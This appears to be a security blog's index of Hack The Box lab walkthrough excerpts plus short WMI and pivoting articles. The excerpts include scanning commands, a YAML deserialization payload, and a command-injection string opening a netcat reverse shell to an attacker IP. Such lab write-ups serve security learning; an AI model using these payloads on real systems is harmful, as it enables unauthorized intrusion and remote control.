Hack The Box – Breadcrumbs
http://10.10.10.228/ βββ(rootπkali)-[/home/kali/Downloads/ffuf] ββ# ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.228/FUZZ https://10.10.10.228/php/books.php https://10.10.10.228/php/ https://10.10.10.228/db/ https://10.10.10.228/books/ https://10.10.10.228/portal/login.php Here click on helper https://10.10.10.228/portal/php/admins.php https://10.10.10.228/portal/login.php...
Hack The Box – Ophiuchi
http://10.10.10.227:8080/ βββ(rootπkali)-[/home/kali/Downloads] ββ# echo “10.10.10.227 ophiuchi.htb” >> /etc/hosts βββ(rootπkali)-[/home/kali/Downloads] ββ# git clone https://github.com/artsploit/yaml-payload βββ(rootπkali)-[/home/kali/Downloads/yaml-payload] ββ# cat rev.sh #!/bin/sh bash -i...
Hack The Box – Scriptkiddie
http://10.10.10.226:5000/ exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ User.txt: ebca83b5823fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX echo “1 2 ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.46 1234...
Hack The Box – Tentacle
βββ(rootπkali)-[/home/kali/Downloads] ββ# nmap -sV -v -p- –min-rate=10000 10.10.10.224 http://10.10.10.224:3128/ By above we get j.nakazawa@realcorp.htbsrv01.realcorp.htb (squid/4.11) βββ(rootπkali)-[/home/β¦/Downloads/SecLists/Discovery/DNS] ββ# dnsenum –threads 64...
Hack The Box -Armageddon
βββ(rootπkali)-[/home/kali/Downloads] ββ# nmap 10.10.10.233 http://10.10.10.233/ Letβs check if we can work a way around the login page! Exploring, I found...
WMI – Red & Blue Team : What is WMI?
WMI stands for Windows Management Instrumentation, and it is a set of specifications from Microsoft that defines a standard interface...
HackTheBox β BountyHunter
βββ(rootkali)-[/home/kali/Downloads] ββ# nmap -A 10.10.11.100 βββ(rootkali)-[/home/kali/Downloads] ββ# dirb http://10.10.11.100/ http://10.10.11.100/resources/ http://10.10.11.100/resources/README.txt βββ(rootkali)-[/home/kali/Downloads] ββ# dirb http://10.10.11.100/ -X .php http://10.10.11.100/portal.php Since it...
HackTheBox β Static Walkthrough
βββ(rootkali)-[/home/kali/Downloads] ββ# nmap -A 10.10.10.246 http://10.10.10.246:8080/ βββ(rootkali)-[/home/kali/Downloads] ββ# gobuster dir -u http://10.10.10.246:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x .php,txt http://10.10.10.246:8080/robots.txt http://10.10.10.246:8080/vpn/...
HackTheBox β Writer Walkthrough
βββ(rootkali)-[/home/kali/Downloads] ββ# nmap -A -v -T4 -Pn 10.10.11.101 βββ(rootkali)-[/home/kali/Downloads] ββ# echo 10.10.11.101 writer.htb > /etc/hosts http://writer.htb/ βββ(rootkali)-[/home/kali/Downloads] ββ# wfuzz -w...
Pivoting Technique
What is Pivoting? Pivoting is a technique that uses to route the traffic from a hacked computer toward other networks...